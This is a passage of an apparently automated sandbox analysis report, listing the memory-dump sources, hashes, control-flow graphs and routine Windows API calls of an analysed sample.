                                                    • Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID: t~9O
                                                    • API String ID: 2063062207-1938914358
                                                    • Opcode ID: 6ca2162a58a0b78415a6f645919e1969129e2daad70bc7c07f5bd30e3b07ecb1
                                                    • Instruction ID: 5dbf5688e861bcb43ed22a3e5d58aaed95f55e56b7cc0ae1887be6d0e8578ec4
                                                    • Opcode Fuzzy Hash: 6ca2162a58a0b78415a6f645919e1969129e2daad70bc7c07f5bd30e3b07ecb1
                                                    • Instruction Fuzzy Hash: 165154B0905249CFDB10DFA9C588BAEBBF1FF49304F25846AD459A7360C7386885CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 404 177b8d0-177b941 GetCurrentProcess 405 177b943-177b949 404->405 406 177b94a-177b97e GetCurrentThread 404->406 405->406 407 177b987-177b9bb GetCurrentProcess 406->407 408 177b980-177b986 406->408 409 177b9c4-177b9dc 407->409 410 177b9bd-177b9c3 407->410 408->407 422 177b9df call 177ba80 409->422 423 177b9df call 177be70 409->423 424 177b9df call 177be60 409->424 410->409 414 177b9e5-177ba14 GetCurrentThreadId 415 177ba16-177ba1c 414->415 416 177ba1d-177ba7f 414->416 415->416 422->414 423->414 424->414
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0177B930
                                                    • GetCurrentThread.KERNEL32 ref: 0177B96D
                                                    • GetCurrentProcess.KERNEL32 ref: 0177B9AA
                                                    • GetCurrentThreadId.KERNEL32 ref: 0177BA03
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID: t~9O
                                                    • API String ID: 2063062207-1938914358
                                                    • Opcode ID: a7c2e988bce4c4724b71d2e72cb3231576dae0d08fe365e789896acaa1683d68
                                                    • Instruction ID: 38b50a2dc67903ac6c6237c537a96c6607dc6dea15f676a8c4e2ee465b407209
                                                    • Opcode Fuzzy Hash: a7c2e988bce4c4724b71d2e72cb3231576dae0d08fe365e789896acaa1683d68
                                                    • Instruction Fuzzy Hash: F15133B09012498FDB14DFA9C548B9EBBF1EF88314F24846AE459A7350D7386845CFA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 425 17798d0-17798e5 call 1778478 428 17798e7 425->428 429 17798fb-17798ff 425->429 480 17798ed call 1779b58 428->480 481 17798ed call 1779b48 428->481 430 1779913-1779954 429->430 431 1779901-177990b 429->431 436 1779956-177995e 430->436 437 1779961-177996f 430->437 431->430 432 17798f3-17798f5 432->429 435 1779a30-1779af0 432->435 473 1779af2-1779af5 435->473 474 1779af8-1779b23 GetModuleHandleW 435->474 436->437 439 1779993-1779995 437->439 440 1779971-1779976 437->440 443 1779998-177999f 439->443 441 1779981 440->441 442 1779978-177997f call 17794bc 440->442 446 1779983-1779991 441->446 442->446 447 17799a1-17799a9 443->447 448 17799ac-17799b3 443->448 446->443 447->448 449 17799b5-17799bd 448->449 450 17799c0-17799c9 call 17794cc 448->450 449->450 455 17799d6-17799db 450->455 456 17799cb-17799d3 450->456 458 17799dd-17799e4 455->458 459 17799f9-17799fd 455->459 456->455 458->459 460 17799e6-17799f6 call 17794dc call 17794ec 458->460 478 1779a00 call 1779e32 459->478 479 1779a00 call 1779e60 459->479 460->459 463 1779a03-1779a06 464 1779a29-1779a2f 463->464 465 1779a08-1779a26 463->465 465->464 473->474 475 1779b25-1779b2b 474->475 476 1779b2c-1779b40 474->476 475->476 478->463 479->463 480->432 481->432
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 01779B16
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID: `BXm4s$t~9O
                                                    • API String ID: 4139908857-2490790541
                                                    • Opcode ID: e371064b02ca325462e2e6fdd9026538b3aace17282d506b536530ebe2fbd36b
                                                    • Instruction ID: 4ba4dd691e15ce1878b8742d65f491b9046fc8f3418d89adb9f234ee332121c2
                                                    • Opcode Fuzzy Hash: e371064b02ca325462e2e6fdd9026538b3aace17282d506b536530ebe2fbd36b
                                                    • Instruction Fuzzy Hash: 667115B0A01B068FDB24DF2AD04479AFBF1BF88218F00892ED58AD7A50D774E845CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 482 177fd40-177fda4 483 177fda6-177fdd8 call 177dbcc 482->483 484 177fe03-177fe5e 482->484 488 177fddd-177fdde 483->488 486 177fe60-177fe66 484->486 487 177fe69-177fe70 484->487 486->487 489 177fe72-177fe78 487->489 490 177fe7b-177ff1a CreateWindowExW 487->490 489->490 492 177ff23-177ff5b 490->492 493 177ff1c-177ff22 490->493 497 177ff5d-177ff60 492->497 498 177ff68 492->498 493->492 497->498 499 177ff69 498->499 499->499
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0177FF0A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID: t~9O$t~9O
                                                    • API String ID: 716092398-1476228867
                                                    • Opcode ID: 1a53bd30a182bf96df1f09e05f3e718ca9ddfd3d129dc58ac8acd00648785e9f
                                                    • Instruction ID: d45a8d1b51798204e6497dc9ff69e17caf5df81723dbb568c8a4926df60c3883
                                                    • Opcode Fuzzy Hash: 1a53bd30a182bf96df1f09e05f3e718ca9ddfd3d129dc58ac8acd00648785e9f
                                                    • Instruction Fuzzy Hash: 96615B71808388EFCF02CFA9C850ADDBFB1BF4A304F19859AE844AB262C7759855DF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 500 177fded-177fe5e 502 177fe60-177fe66 500->502 503 177fe69-177fe70 500->503 502->503 504 177fe72-177fe78 503->504 505 177fe7b-177feb3 503->505 504->505 506 177febb-177ff1a CreateWindowExW 505->506 507 177ff23-177ff5b 506->507 508 177ff1c-177ff22 506->508 512 177ff5d-177ff60 507->512 513 177ff68 507->513 508->507 512->513 514 177ff69 513->514 514->514
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0177FF0A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID: t~9O$t~9O
                                                    • API String ID: 716092398-1476228867
                                                    • Opcode ID: d8f4bd2378a5be557e0d6099eb7805c326d64946408d20556d422652a4e2b27f
                                                    • Instruction ID: 520ca57577e7b85a607846bc7cc3857f338983d490a7cff64f132571023f05f5
                                                    • Opcode Fuzzy Hash: d8f4bd2378a5be557e0d6099eb7805c326d64946408d20556d422652a4e2b27f
                                                    • Instruction Fuzzy Hash: D251CEB1D003499FDF14CFA9C984ADEFBB1BF49314F25862AE819AB210D7749985CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 515 177fdf8-177fe5e 516 177fe60-177fe66 515->516 517 177fe69-177fe70 515->517 516->517 518 177fe72-177fe78 517->518 519 177fe7b-177feb3 517->519 518->519 520 177febb-177ff1a CreateWindowExW 519->520 521 177ff23-177ff5b 520->521 522 177ff1c-177ff22 520->522 526 177ff5d-177ff60 521->526 527 177ff68 521->527 522->521 526->527 528 177ff69 527->528 528->528
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0177FF0A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID: t~9O$t~9O
                                                    • API String ID: 716092398-1476228867
                                                    • Opcode ID: 47f6f6f3d725b9744eece5e166a0e20aa5e658ffa79ab94057589dfa55e1f071
                                                    • Instruction ID: 6548c3f3b4fc7439735676f517c38ecbb599558735a6cc7c8d5e3e9b2fd45760
                                                    • Opcode Fuzzy Hash: 47f6f6f3d725b9744eece5e166a0e20aa5e658ffa79ab94057589dfa55e1f071
                                                    • Instruction Fuzzy Hash: 9E41C0B1D003099FDF14CF99C984ADEFBB5BF48314F24812AE819AB210D7749985CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 567 177baf0-177baf4 568 177baf8-177bb8c DuplicateHandle 567->568 569 177bb95-177bbb2 568->569 570 177bb8e-177bb94 568->570 570->569
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0177BB7F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID: t~9O
                                                    • API String ID: 3793708945-1938914358
                                                    • Opcode ID: 199151dfae9457b1519f6368be38915c7503f37a14f03f11fe6ed98ce0c7a7a0
                                                    • Instruction ID: 5e551435cda1a7c5ebc86cb6af81f54f23a1117c59bef56940b03440f77ddf09
                                                    • Opcode Fuzzy Hash: 199151dfae9457b1519f6368be38915c7503f37a14f03f11fe6ed98ce0c7a7a0
                                                    • Instruction Fuzzy Hash: 7221F4B59012489FDF10CFA9D484AEEFBF4FB48320F15842AE954A7310C378A945CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 573 1779500-1779508 575 1779512-1779d78 573->575 576 177950a-1779510 573->576 578 1779d80-1779daf LoadLibraryExW 575->578 579 1779d7a-1779d7d 575->579 576->575 580 1779db1-1779db7 578->580 581 1779db8-1779dd5 578->581 579->578 580->581
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01779B91,00000800,00000000,00000000), ref: 01779DA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID: t~9O
                                                    • API String ID: 1029625771-1938914358
                                                    • Opcode ID: 5e14c13de3bfeb41adc9c4d71aa7eca317efbc3dc293d113ecc66b7e5d09b09f
                                                    • Instruction ID: 6e8653a3251978749504df74a6bff64455f0ca1068c9623d97e435d33a6f47fb
                                                    • Opcode Fuzzy Hash: 5e14c13de3bfeb41adc9c4d71aa7eca317efbc3dc293d113ecc66b7e5d09b09f
                                                    • Instruction Fuzzy Hash: 362135B68052488FDB10CFAAC484ADEFBF4EF89324F15846ED515A7200C379A985CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 584 177baf8-177bb8c DuplicateHandle 585 177bb95-177bbb2 584->585 586 177bb8e-177bb94 584->586 586->585
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0177BB7F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID: t~9O
                                                    • API String ID: 3793708945-1938914358
                                                    • Opcode ID: 6852c30177f6504e8b98000c3432ad14d73a72a6d53794dbef4d6c6da7b9b0e7
                                                    • Instruction ID: 95523aff320a651e38a3d07fbe7a89433843525e626995d1f0349d7ff30b03b9
                                                    • Opcode Fuzzy Hash: 6852c30177f6504e8b98000c3432ad14d73a72a6d53794dbef4d6c6da7b9b0e7
                                                    • Instruction Fuzzy Hash: 0921C4B5D012489FDB10CFA9D484AEEFBF4FB48324F15841AE915A7350D378A954CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 589 1779d30-1779d78 591 1779d80-1779daf LoadLibraryExW 589->591 592 1779d7a-1779d7d 589->592 593 1779db1-1779db7 591->593 594 1779db8-1779dd5 591->594 592->591 593->594
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01779B91,00000800,00000000,00000000), ref: 01779DA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID: t~9O
                                                    • API String ID: 1029625771-1938914358
                                                    • Opcode ID: 2ddada9201cd3174b42ee8ab81bb21766fbbc031a4aa224aa384a5000fbf3645
                                                    • Instruction ID: d6ef1479040b6fb0a3112aa19a8943d7a54f967fb382447fccb140bace96ffc9
                                                    • Opcode Fuzzy Hash: 2ddada9201cd3174b42ee8ab81bb21766fbbc031a4aa224aa384a5000fbf3645
                                                    • Instruction Fuzzy Hash: 7B21F2B6C012489FDF10CF9AC484ADEFBF4EB89324F15846ED955A7210C379A945CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 597 177950c-1779d78 599 1779d80-1779daf LoadLibraryExW 597->599 600 1779d7a-1779d7d 597->600 601 1779db1-1779db7 599->601 602 1779db8-1779dd5 599->602 600->599 601->602
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01779B91,00000800,00000000,00000000), ref: 01779DA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID: t~9O
                                                    • API String ID: 1029625771-1938914358
                                                    • Opcode ID: 3dd0a3ad4e9de9d69b64f90bf819fd4706941e89f23cf640c92f240ea51b5528
                                                    • Instruction ID: 95fec5afcdf0f7e21bdd8ca647cee640c8bbcc5214137264171b71eb41e1e47f
                                                    • Opcode Fuzzy Hash: 3dd0a3ad4e9de9d69b64f90bf819fd4706941e89f23cf640c92f240ea51b5528
                                                    • Instruction Fuzzy Hash: 091103B69012489FDB10CF9AC444ADEFBF4EB89324F15842ED515A7200C379A985CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 01779B16
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID: t~9O
                                                    • API String ID: 4139908857-1938914358
                                                    • Opcode ID: c9a3ff801c75d2ad9d5e74afac7b39bf5b506f51c3f867344fb96a1e09fbb263
                                                    • Instruction ID: ae12b582d3f762e62a432f0c2659085a7c3fb2495c83a84a1e396cb744cfaa21
                                                    • Opcode Fuzzy Hash: c9a3ff801c75d2ad9d5e74afac7b39bf5b506f51c3f867344fb96a1e09fbb263
                                                    • Instruction Fuzzy Hash: 3D110FB6C012498FDB10CF9AC444BDEFBF5EB89224F15842AD529B7210C378A945CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetTimer.USER32(?,01746190,?,?,?,?,?,?,?,07649950,00000000,?,00000000), ref: 07649AFD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.335506351.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7640000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Timer
                                                    • String ID: t~9O
                                                    • API String ID: 2870079774-1938914358
                                                    • Opcode ID: 13d3ef0e133074374b1a64e0e1511721c0a9742c95724e243d9d183cd9006c67
                                                    • Instruction ID: 96e81b5cb0bd1a50053f399f89d25b0e83acc05b77211113a1468d288e06bab7
                                                    • Opcode Fuzzy Hash: 13d3ef0e133074374b1a64e0e1511721c0a9742c95724e243d9d183cd9006c67
                                                    • Instruction Fuzzy Hash: E911F2B59003499FCB10DF99C489BDFBBF8EB49324F10841AE555A7700C379A984CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.308154320.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_146d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a5bba8f364d182e6afa3b15e638989d0ba714c0c76a113783d7261e9ecfc912d
                                                    • Instruction ID: 13fbb3ae2462b06ceca7ff2647bfc9d15d5bd0f6e988aed76736ae01c8b1188b
                                                    • Opcode Fuzzy Hash: a5bba8f364d182e6afa3b15e638989d0ba714c0c76a113783d7261e9ecfc912d
                                                    • Instruction Fuzzy Hash: C52136B1A04240DFDB15DF44D8C0B27BF69FB8832CF24856AE9454B626C336D846CBA3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.308230741.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_147d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 58b6169be0d299c8042e405db0ba6c1737aa0edcdd276ca623cc97e9e1a9e374
                                                    • Instruction ID: 2a0afc2708f5bc2711eaace469d79506ed4e9196fed15a65abe5e6d6b2ed4ba2
                                                    • Opcode Fuzzy Hash: 58b6169be0d299c8042e405db0ba6c1737aa0edcdd276ca623cc97e9e1a9e374
                                                    • Instruction Fuzzy Hash: 77213771A14200DFDB05DF94D9C0B66BBA5FF84324F24C96EE9094B366C336D847CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.308230741.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_147d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d95eea5e0ea54d80ff79221fd2917140b35184fa752e29aa8eedca30bb710b2c
                                                    • Instruction ID: f493a53f121ef312ccb408e8afa7e908bac5fc1a28c8838fafcdd25612e6fea4
                                                    • Opcode Fuzzy Hash: d95eea5e0ea54d80ff79221fd2917140b35184fa752e29aa8eedca30bb710b2c
                                                    • Instruction Fuzzy Hash: 332167B5904280DFDB16DF54D8C0B62BBA1FF84358F24C56ED90A4B356C33AD807CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.308230741.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_147d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 301a6e72c28a2daae9523ecf55b36c1b37a37a36f3f4a8f6ca91a8aecc6daf1b
                                                    • Instruction ID: 6fd368c14c8ab1a31b080504499b382dbd4d02a764e13ae6bc102c5578d2a38f
                                                    • Opcode Fuzzy Hash: 301a6e72c28a2daae9523ecf55b36c1b37a37a36f3f4a8f6ca91a8aecc6daf1b
                                                    • Instruction Fuzzy Hash: C4217F755093C08FCB13CF24D990756BF71EF46214F28C5DAD8498B667C33A984ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.308154320.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_146d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 17894ca1eab804f1555070659dd00dfff87542e61665d1c8f73af2d5ff09c7fa
                                                    • Instruction ID: 6e8b55ca7b59c3b88364f523360395244cded05ccd4ce6bccc9a77e3b577fd95
                                                    • Opcode Fuzzy Hash: 17894ca1eab804f1555070659dd00dfff87542e61665d1c8f73af2d5ff09c7fa
                                                    • Instruction Fuzzy Hash: 9111B176904280CFDB12CF54D5C4B56BF71FB84328F2886AAD9454B727C336D456CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.308230741.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_147d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d58ca62981777cd3cbf56bb22269b8e21f4586939eb6954d17036f4794f2a560
                                                    • Instruction ID: f58be0cd1855bc1cbd8b936a632c92fe82c3aaac68a6120f0371542a58a87501
                                                    • Opcode Fuzzy Hash: d58ca62981777cd3cbf56bb22269b8e21f4586939eb6954d17036f4794f2a560
                                                    • Instruction Fuzzy Hash: 1A11A975904280DFCB12CF54C5C0B56BBA1FB84224F28C6AAD8494B766C33AD44ACB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.308154320.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_146d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00eb7d4e4f506eea969f0a4397bf30a40883475b6272f9d351078937838fb5a2
                                                    • Instruction ID: 376b8db4f5f8494c0f0828c44cb685c5780e0656cf93e0e5cde9d1645f635ed8
                                                    • Opcode Fuzzy Hash: 00eb7d4e4f506eea969f0a4397bf30a40883475b6272f9d351078937838fb5a2
                                                    • Instruction Fuzzy Hash: 9E014771A083C09AE7108E69CCC4B67BB9CEF4127DF08812BEA440B356C33D9840CAB3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.308154320.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_146d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 77f3fc2c3f7f21135ae056fb5e9c842da643b3ad6aefce6b1ee92f17ea6d38ce
                                                    • Instruction ID: 7d296b1ed6523eff2469dce84c37baf6936f8cab4de13c62ea5561d0e141c872
                                                    • Opcode Fuzzy Hash: 77f3fc2c3f7f21135ae056fb5e9c842da643b3ad6aefce6b1ee92f17ea6d38ce
                                                    • Instruction Fuzzy Hash: 75F0C8719042849AE7108E19CC84B63FFACEB41234F18C05AED481B386C37C5844CAB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.335506351.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7640000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2b09cce145ae107f569b995692cb14cac04e9b4aa6ec5f70a099532bfda92547
                                                    • Instruction ID: b66a7961ae3fc7326b397f1901a8f216f1c6bd3972d063e20a8c54a251da145d
                                                    • Opcode Fuzzy Hash: 2b09cce145ae107f569b995692cb14cac04e9b4aa6ec5f70a099532bfda92547
                                                    • Instruction Fuzzy Hash: F632A3B4A052558FDB24DFB8C8507AEBBF2AF89304F14816DD50AEB384DB349C45CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 840ba74975178958e862427ae41218fcf939c83c27020006a726fd7de9bb4df3
                                                    • Instruction ID: a1ad70d6a961b62e96dff317da72f090bd8b5e6c3dcf5216669b6e307f7a8dba
                                                    • Opcode Fuzzy Hash: 840ba74975178958e862427ae41218fcf939c83c27020006a726fd7de9bb4df3
                                                    • Instruction Fuzzy Hash: C212A4F9611746CBE330CF65E8985893FA1B745338F90C30AD2612BAD9D7B8164ACF85
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 948491a8d87548869699937cfcca3c4609e593a6201e614eb3b60346b197c414
                                                    • Instruction ID: 5479551d8df7ccbef7717cf7e0f9912fb6282bfad3ed0aac138aff7e4acfbf12
                                                    • Opcode Fuzzy Hash: 948491a8d87548869699937cfcca3c4609e593a6201e614eb3b60346b197c414
                                                    • Instruction Fuzzy Hash: 3FA16C36E0061ACFCF16DFA5C84459EFBB2FF88300F15856AE905AB225EB71E905CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.309138862.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1770000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 568d968e78b5d2aff9d233dff1ed61f7e6f9c4156a839c7ad3a91e071a1e2028
                                                    • Instruction ID: be13d017e52f1d124a322109f35b5a2e247c6319f09a23d0f54954f113cf9d29
                                                    • Opcode Fuzzy Hash: 568d968e78b5d2aff9d233dff1ed61f7e6f9c4156a839c7ad3a91e071a1e2028
                                                    • Instruction Fuzzy Hash: 0BC13DB9611745CBD720CF64E8985897FB1FB85338F51C30AD2612BAD8D7B8164ACF84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemMetrics.USER32(0000003B), ref: 0764B386
